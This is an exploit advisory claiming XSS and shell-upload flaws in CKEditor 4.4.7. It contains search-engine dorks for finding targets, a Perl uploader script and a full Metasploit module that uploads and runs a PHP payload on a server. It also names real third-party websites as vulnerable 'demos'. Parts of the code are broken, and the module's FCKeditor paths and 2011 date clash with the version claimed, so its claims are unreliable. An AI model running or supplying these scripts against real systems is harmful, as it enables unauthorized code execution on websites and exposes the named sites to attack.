Ckeditor 4.4.7 Shell Upload / Cross Site Scripting

`###########################################  
#-----------------------------------------#  
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#  
#-----------------------------------------#  
# *----------------------------* #  
# K |....##...##..####...####....| . #  
# h |....#...#........#..#...#...| A #  
# a |....#..#.........#..#....#..| N #  
# l |....###........##...#.....#.| S #  
# E |....#.#..........#..#....#..| e #  
# D |....#..#.........#..#...#...| u #  
# . |....##..##...####...####....| r #  
# *----------------------------* #  
#-----------------------------------------#  
#[ Copyright © 2014 | Dz Offenders Cr3w ]#  
#-----------------------------------------#  
###########################################  
# >> D_x . Made In Algeria . x_Z << #  
######################################################################  
#  
# [>] Title : Ckeditor v4.4.7.xx Multiple Vulnerabilities  
#  
# [>] Author : KedAns-Dz  
# [+] E-mail : ked-h (@hotmail.com)  
# [+] FaCeb0ok : fb.me/K3d.Dz  
# [+] TwiTter : @kedans  
#  
# [#] Platform : PHP / WebApp  
# [+] Cat/Tag : File Upload , XSRF-HTML Injection  
#  
# [<] <3 <3 Greetings t0 Palestine <3 <3  
# [>] ^_^ Greetings to 1337day Users/FAN's <3  
# [-] F-ck Hacking , LuV Exploiting  
# [!] Vendor : http://ckeditor.com/  
# [D] Download :   
# - http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.4.7/ckeditor_4.4.7_full.zip  
#  
#######################################################################  
#  
# [!] Description :  
#  
# FCKeditor version 4.4.7 is suffer from XSS/HTML Injection and   
# Other multiple vulnerabilities like File Upload (more ex: see->   
# [ http://1337day.com/search?search_request=ckeditor ]  
# remote attacker can use some CKE files to upload remote file or   
# Injecting XSS/HTML Codes.  
#  
#  
#####  
#  
# [!] Google Dorks :   
# ------------------  
# 1- allinurl:"/ckeditor/samples/plugins/htmlwriter"  
# 2- allinurl:"/ckeditor/samples/plugins/htmlwriter/outputhtml.html"  
# 3- allinurl:"/FCKeditor/_samples/php/sample01.php"  
# 4- allinurl:"/FCKeditor/editor/filemanager/browser/default/browser.html"  
# 5- allinurl:"/FCKeditor/editor/filemanager"  
#  
#####  
#  
# [+] Exploit (1) ' XSS/XSRF/HTML Injection ' :=>  
# -----------------------------------------------  
#  
# - the vuln in htmlwriter plugin :  
#  
# > http://[target]/[path]/ckeditor/samples/plugins/htmlwriter/outputhtml.html  
#  
# > Edit & Submit you'r Code just it !  
#  
#####  
#  
# [+] Exploit (2) ' File Upload ' :=>  
# -----------------------------------  
# REF : http://1337day.com/search?search_request=ckeditor  
#  
# +> Use this PERL Script :=>  
# ***********  
# #!/usr/bin/perl  
#  
# use strict;  
# use LWP::UserAgent;  
# use HTTP::Request::Common;  
#   
# print <<INTRO;  
# - CKEditor 4.4.x Arbitrary File Upload Exploit  
# - Coded By KedAns-Dz  
# - Contact: [email protected]  
# - Greetings: 1337day , Dz Offenders , All my Homies  
# - Copyright (C) 03-2015 - Dz Offenders Cr3w  
# INTRO  
# print "Target host and Path: ";  
# chomp (my $tar=<STDIN>);  
# print "Directory / File / Shell: ";  
# chomp (my $shell=<STDIN>);  
#   
# my $a = LWP::UserAgent->new;  
# my $b = $a->request(POST $tar.'/fckeditor/editor/filemanager/browser/upload/php/upload.php';  
# Content_Type => 'form-data',  
# Content => [ NewFile => $shell ] );  
#   
# if ($b->is_success) {  
# if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; }   
# else { print "Exploit failed! :(\n";  
# } else { print "Not connected with Target!\n"; }  
#  
##########  
# *********  
# Or wit' that MSF Exploit :=>  
#  
#  
# require 'msf/core'  
#   
# class Metasploit3 < Msf::Exploit::Remote  
# Rank = ExcellentRanking  
#   
# include Msf::Exploit::Remote::HttpClient  
#   
# def initialize(info = {})  
# super(update_info(info,  
# 'Name' => 'FCKeditor 4.4.x File Upload Code Execution',  
# 'Description' => %q{  
# This module exploits a vulnerability in the FCK/CKeditor plugin.  
# By renaming the uploaded file this vulnerability can be used to upload/execute  
# code on the affected system.  
# },  
# 'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ],  
# 'License' => MSF_LICENSE,  
# 'Version' => '1.0',  
# 'References' =>  
# [  
# ['URL', 'http://1337day.com/search?search_request=ckeditor'],  
# ],  
# 'Privileged' => false,  
# 'Payload' =>  
# {  
# 'DisableNops' => true,  
# 'Compat' =>  
# {  
# 'ConnectionType' => 'find',  
# },  
# 'Space' => 1024,  
# },  
# 'Platform' => 'php',  
# 'Arch' => ARCH_PHP,  
# 'Targets' => [[ 'Automatic', { }]],  
# 'DisclosureDate' => '02/05/2011',  
# 'DefaultTarget' => 0))  
#   
# register_options(  
# [  
# OptString.new('URI', [true, "CKE Target directory path", "/"]),  
# ], self.class)  
# end  
#   
# def check  
# uri = ''  
# uri << datastore['URI']  
# uri << '/' if uri[-1,1] != '/'  
# uri << 'fckeditor/editor/filemanager/connectors/php/upload.php?Type=File'  
# res = send_request_raw(  
# {  
# 'uri' => uri  
# }, 25)  
#   
# if (res and res.body =~ /sample16.swf/)  
# return Exploit::CheckCode::Vulnerable  
# end  
#   
# return Exploit::CheckCode::Safe  
# end  
#   
#   
# def retrieve_obfuscation()  
#   
# end  
#   
#   
# def exploit  
#   
# cmd_php = '<?php ' + payload.encoded + '?>'  
#   
# # Generate some random strings  
# cmdscript = rand_text_alpha_lower(20)  
# boundary = rand_text_alphanumeric(6)  
#   
# # Static files  
# directory = '/fckeditor/editor/images'  
# uri_base = ''  
# uri_base << datastore['URI']  
# uri_base << '/' if uri_base[-1,1] != '/'  
# uri_base << 'fckeditor/editor/filemanager/connectors/php'  
#   
# # Get obfuscation code (needed to upload files)  
# obfuscation_code = nil  
#   
# res = send_request_raw({  
# 'uri' => uri_base + '/upload.php?Type=File'  
# }, 25)  
#   
# if (res)  
#   
# if(res.body =~ /"obfus", "((\w)+)"\)/)  
# obfuscation_code = $1  
# print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")  
# else  
# print_error("Error retrieving obfuscation code!")  
# return  
# end  
# end  
#   
# # Upload shellcode (file ending .ph.p)  
# data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"  
# data << "#{cmdscript}.ph.p\r\n--#{boundary}"  
# data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"  
# data << "Content-Type: application/octet-stream\r\n\r\n"  
# data << cmd_php  
# data << "\r\n--#{boundary}--"  
#   
# res = send_request_raw({  
# 'uri' => uri_base + "/connector.php?Command=FileUpload&Type=File&CurrentFolder=" + directory + "&obfuscate=#{obfuscation_code}",  
# 'method' => 'POST',  
# 'data' => data,  
# 'headers' =>  
# {  
# 'Content-Length' => data.length,  
# 'Content-Type' => 'multipart/form-data; boundary=' + boundary,  
# }  
# }, 25)  
#   
# if (res and res.body =~ /File Upload Success/)  
# print_status("Successfully uploaded #{cmdscript}.ph.p")  
# else  
# print_error("Error uploading #{cmdscript}.ph.p")  
# end  
#  
# # Complete the upload process (rename file)  
# print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")  
# res = send_request_raw({  
# 'uri' => uri_base + '/connector.php?Command=FileUpload&Type=File&CurrentFolder=' + directory + '&filetotal=1'  
# })  
#   
# # Rename the file from .ph.p to .php  
# res = send_request_cgi(  
# {  
# 'method' => 'POST',  
# 'uri' => uri_base + '/connector.php?Command=Edit&Type=File&CurrentFolder=',  
# 'vars_post' =>  
# {  
# 'actionfile[0]' => "#{cmdscript}.ph.p",  
# 'renameext[0]' => 'p',  
# 'renamefile[0]' => "#{cmdscript}.ph",  
# 'sortby' => 'name',  
# 'sorttype' => 'asc',  
# 'showpage' => '0',  
# 'action' => 'rename',  
# 'commit' => '',  
# }  
# }, 10)  
#   
# if (res and res.body =~ /successfully renamed./)  
# print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")  
# else  
# print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")  
# end  
#   
#   
# # Finally call the payload  
# print_status("Calling payload: #{cmdscript}.php")  
# uri = ''  
# uri << datastore['URI']  
# uri << '/' if uri[-1,1] != '/'  
# uri << directory + cmdscript + ".php"  
# res = send_request_raw({  
# 'uri' => uri  
# }, 25)  
#   
# end  
#   
# end  
#  
#  
#  
###########  
#  
# Demo's :=>  
# http://common.beyondindigopets.com/ckeditor/samples/plugins/htmlwriter/outputhtml.html  
# http://heather.cs.ucdavis.edu/ckeditor/samples/plugins/htmlwriter/outputhtml.html  
# http://dol-de-bretagne.fr/scripts/FCKeditor/_samples/php/sample01.php  
# http://tutor.talkbean.com/front/com/FCKeditor/editor/filemanager/browser/default/browser.html  
# http://www.aseat.fr/fckeditor/editor/filemanager/browser/default/browser.html  
# Mo in g00glE ;)  
#######################################################################  
  
####  
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>  
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3  
#---------------------------------------------------------------  
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,   
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,  
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &  
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &  
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &  
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &   
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=  
####  
`